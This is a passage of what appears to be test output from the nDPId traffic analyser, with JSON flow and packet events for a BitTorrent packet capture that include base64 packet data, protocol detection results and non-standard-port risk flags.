\/\/\/91\/\/\/\/\/9\/\/\/\/\/\/\/\/\/\/\/\/\/\/4AAAAAFBAAAAtIAAAAFBAAAAngAAAAFBAAAAeYAAAAFBAAAAUUAAAAFBAAAAskAAAAFBAAAAGcAAAAFBAAAArYAAAAFBAAAAVgAAAAFBAAAAQEAAAAFBAAAAjMAAAAFBAAAAqAAAAAFBAAAAMoAAAAFBAAAAxIAAAAFBAAAAlIAAAAFBAAAAc8AAAAFBAAAAkMAAAAFBAAAAagAAAAFBAAAAhsAAAAFBAAAAzgAAAAFBAAAAacAAAAFBAAAAxQAAAAFBAAAAw4AAAAFBAAAAVwAAAAFBAAAAqI="} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969259,"flow_last_seen":1455469969259,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969259,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52895,"dst_port":51413,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1455469969259,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469969259,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4K5tAAEAGAADAqAEDU9i48c6fyNXli2jySWt7B4AYK\/LO3wAAAQEIChnb9+x4G0bsE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjvi3q9Fc8jVIrp0="} +00724{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969259,"flow_last_seen":1455469969259,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969259,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52895,"dst_port":51413,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 
+00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1455469969318,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":148,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":148,"pkt_l4_len":114,"thread_ts_msec":1455469969318,"pkt":"xCwDBkn+LFbcjDU0CABFYACGozdAADIG1mVT2LjxwKgBA8jVzp9Ja3sH5YtpNoAYECl7XAAAAQEICngbRx8Z2\/fsE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMTg4Qi2qniMLxLorRFP2hZAAAAEAFABkMTplaTBlNA=="} +01379{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1455469969391,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":648,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":648,"pkt_l4_len":614,"thread_ts_msec":1455469969391,"pkt":"xCwDBkn+LFbcjDU0CABFYAJ6SOJAADIGLsdT2LjxwKgBA8jVzp9Ja3tZ5YtpNoAYECl87wAAAQEICngbR0YZ2\/gmOmlwdjQ0OlPYuPE0OmlwdjYxNjr+gAAAAAAAAOoGiP\/+zfQTMTI6Y29tcGxldGVfYWdvaTFlMTptZDExOnVwbG9hZF9vbmx5aTNlMTE6bHRfZG9udGhhdmVpN2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGk1MTQxM2U0OnJlcXFpMjU1ZTE6djE1Os68VG9ycmVudCAxLjguODI6eXBpNTI4OTVlNjp5b3VyaXA0OlI3zQFlAAAAdAX\/\/3\/\/\/\/\/7\/3\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/b\/\/\/f\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/9\/\/\/\/7\/\/\/\/\/\/\/99\/\/\/\/\/\/3\/\/97\/v\/\/\/\/\/9\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/f\/\/\/\/\/\/7\/\/\/X\/\/\/\/9\/\/+AAAAABQQAAAG6AAAABQQAAAITAAAABQQAAAHTAAAABQQAAAA1AAAABQQAAAAQAAAABQQAAAHdAAAABQQAAAMaAAAABQQAAAE+AAAABQQAAANHAAAABQQAAAN+AAAABQQAAAIEAAAABQQAAAHOAAAABQQAAAGSAAAABQQAAAC8AAAABQQAAANcAAAABQQAAAGMAAAABQQAAABAAAAABQQAAAFbAAAABQQAAAEBAAAABQQAAACdAAAABQQAAADUAAAABQQAAAC\/AAAABQQAAAKPAAAABQQAAANe"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969441,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52896,"dst_port":14627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1455469969441,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469969441,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4XbBAAEAGAADAqAEDTzXkAs6gOSOymifHI+P1WoAYmwf1TQAAAQEIChnb+J8AAH2QE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjqb8v2rPEXkzqd0="} +00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969441,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52896,"dst_port":14627,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": 
{"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969441,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52894,"dst_port":39332,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1455469969441,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469969441,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4duZAAEAGAADAqAEDeD4h8c6emaQxnKbPGdPY9oAYmwdcRQAAAQEIChnb+J8AQ+diE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjsdMZTLXvd5m7DE="} +00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969441,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52894,"dst_port":39332,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI 
(cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00589{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1455469969680,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":151,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":151,"pkt_l4_len":117,"thread_ts_msec":1455469969680,"pkt":"xCwDBkn+LFbcjDU0CABFAACJEvpAAHcG+5FPNeQCwKgBAzkjzqAj4\/VaspooC4AYAQLEvgAAAQEICgAAfaoZ2\/ifE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wovPx6i8m4ev0sHgAAADnFABkMTplaTBlNDppcA=="} +01342{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1455469969689,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":620,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":620,"pkt_l4_len":586,"thread_ts_msec":1455469969689,"pkt":"xCwDBkn+LFbcjDU0CABFAAJeEvxAAHcG+bpPNeQCwKgBAzkjzqAj4\/WvspooC4AZAQKoaAAAAQEICgAAfaoZ2\/ifdjQ0Ok815AIxMjpjb21wbGV0ZV9hZ29pNmUxOm1kMTE6dXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTE0NjI3ZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDMuNC41Mjp5cGk1Mjg5NmU2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/\/\/\/\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/9\/7\/\/\/\/\/fv\/\/\/\/\/\/f\/\/\/3\/\/\/\/\/9\/7\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/v\/+\/\/\/\/9\/\/\/\/\/\/\/\/+\/\/\/9\/\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8\/\/\/\/\/\/f\/\/\/\/\/\/7\/\/\/\/\/\/f\/\/3\/P\/\/\/\/\/4AAAAAFBAAAA2sAAAAFBAAAAW0AAAAFBAAAAlYAAAAFBAAAAdEAAAAFBAAAAPQAAAAFBAAAAtIAAAAFBAAAAMsAAAAFBAAAAyUAAAAFBAAAAKMAAAAFBAAAAMQAAAAFBAAAAcEAAAAFBAAAAtMAAAAFBAAAAiUAAAAFBAAAAEYAAAAFBAAAAT8AAAAFBAAAAe4AAAAFBAAAAjwAAA
AFBAAAAvgAAAAFBAAAA2oAAAAFBAAAA2AAAAAFBAAAAJgAAAAFBAAAATQAAAAFBAAAAQ4AAAAFBAAAA0w="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469970233,"flow_last_seen":1455469970233,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469970233,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52897,"dst_port":22673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1455469970233,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469970233,"pkt":"LFbcjDU0xCwDBkn+CABFAAB45PBAAEAGAADAqAEDlxpfHs6hWJHZNtVIfkyTS4AYJnO4TgAAAQEIChnb+7IRKfdEE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjjCQUdTBqR8vIZE="} +00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469970233,"flow_last_seen":1455469970233,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469970233,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52897,"dst_port":22673,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI 
(cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1455469970293,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":178,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":178,"pkt_l4_len":144,"thread_ts_msec":1455469970293,"pkt":"xCwDBkn+LFbcjDU0CABFAACkCYZAAHIGRuqXGl8ewKgBA1iRzqF+TJNL2TbVjIAYHVxFKAAAAQEIChEp94AZ2\/uyE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC2coXQqpAS87AVXIDwAAADnFABkMTplaTBlNDppcHY0NDqXGl8eMTI6Y29tcGxldGVfYWdvaTFlMQ=="} +01305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1455469970357,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":593,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":593,"pkt_l4_len":559,"thread_ts_msec":1455469970357,"pkt":"xCwDBkn+LFbcjDU0CABFAAJDCYlAAHIGRUiXGl8ewKgBA1iRzqF+TJO72TbVjIAYHVwHogAAAQEIChEp97wZ2\/vsOm1kMTE6dXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTIyNjczZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDMuNC41Mjp5cGk1Mjg5N2U2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/2\/3\/\/\/\/r\/\/\/\/\/9\/3\/\/\/\/\/9\/+\/\/+\/\/+\/\/\/\/f\/\/\/\/\/\/9\/\/\/\/\/\/\/\/\/\/f\/9\/\/\/\/\/\/\/\/+\/\/\/+\/v\/\/\/7\/\/7\/\/9\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/4AAAAAFBAAAAUAAAAAFBAAAAboAAAAFBAAAArkAAAAFBAAAA0EAAAAFBAAAAD0AAAAFBAAAAvsAAAAFBAAAAPwAAAAFBAAAAPMAAAAFBAAAAqcAAAAFBAAAAX0AAAAFBAAAAY8AAAAFBAAAAaEAAAAFBAAAAo0AAAAFBAAAAPAAAAAFBAAAAegAAAAFBAAAAjYAAAAFBAAAARsAAAAF
BAAAAm0AAAAFBAAAAoUAAAAFBAAAAUoAAAAFBAAAARkAAAAFBAAAAswAAAAFBAAAAiYAAAAFBAAAAXA="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469970452,"flow_last_seen":1455469970452,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469970452,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52893,"dst_port":12097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1455469970452,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469970452,"pkt":"LFbcjDU0xCwDBkn+CABFAAB41kZAAEAGAADAqAEDTzeBFs6dL0HtOa3YPhLeWYAYVhCSYwAAAQEIChnb\/IcCXeBSE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjpi3Emqkm5uHs80="} +00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469970452,"flow_last_seen":1455469970452,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469970452,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52893,"dst_port":12097,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI 
(cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469971321,"flow_last_seen":1455469971321,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469971321,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52903,"dst_port":60163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1455469971321,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469971321,"pkt":"LFbcjDU0xCwDBkn+CABFAAB48HJAAEAGAADAqAEDxmSSCc6n6wMx0mzN3F5zZYAYZooahAAAAQEIChnb\/+QB8nE1E0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjuG56+SlFtqa9S4="} +00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469971321,"flow_last_seen":1455469971321,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469971321,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52903,"dst_port":60163,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1455469971481,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1455469971481,"pkt":"xCwDBkn+LFbcjDU0CABFAACcFzZAAHYG0wzGZJIJwKgBA+sDzqfcXnNlMdJtEYAYAQK5ewAAAQEICgHycUYZ2\/\/kE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wopccBVvnEHfGIYQAAADnFABkMTplaTBlNDppcHY0NDrGZJIJMTI6Y29tcGxldGU="} +01316{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1455469971641,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":601,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":601,"pkt_l4_len":567,"thread_ts_msec":1455469971641,"pkt":"xCwDBkn+LFbcjDU0CABFAAJLGqBAAHYGzfPGZJIJwKgBA+sDzqfcXnPNMdJtEYAYAQJeTwAAAQEICgHycVYZ3ACEX2Fnb2kyZTE6bWQxMTp1cGxvYWRfb25seWkzZTExOmx0X2RvbnRoYXZlaTdlMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpNjAxNjNlNDpyZXFxaTI1NWUxOnYxNTrOvFRvcnJlbnQgMy40LjUyOnlwaTUyOTAzZTY6eW91cmlwNDpSN80BZQAAAHQF\/\/\/\/\/\/\/f9\/\/\/\/37\/\/7\/\/\/\/\/\/\/3r\/\/\/\/3+\/\/7\/\/\/\/3\/\/9\/\/\/\/\/\/\/\/\/\/\/37\/7\/\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/f\/\/\/f\/\/\/\/\/v\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/9\/\/\/gAAAAAUEAAAClAAAAAUEAAAAnQAAAAUEAAAAVwAAAAUEAAACuQAAAAUEAAAAUAAAAAUEAAAA8gAAAAUEAAAB4QAAAAUEAAADfAAAAAUEAAABUwAAAAUEAAAAKgAAAAUEAAAANAAAAAUEAAABXwA
AAAUEAAAAaQAAAAUEAAAAmAAAAAUEAAACfAAAAAUEAAADWQAAAAUEAAABTAAAAAUEAAABBgAAAAUEAAABegAAAAUEAAAA1QAAAAUEAAAAxQAAAAUEAAAAvAAAAAUEAAAAnwAAAAUEAAAC6Q=="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469971675,"flow_last_seen":1455469971675,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469971675,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52902,"dst_port":46633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1455469971675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469971675,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4IXFAAEAGAADAqAEDvmfDOM6mtimT1S+nN0acgIAY\/\/9DtgAAAQEIChncAUQAv2TsE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjkGjzZtimXS5YKE="} +00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469971675,"flow_last_seen":1455469971675,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469971675,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52902,"dst_port":46633,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
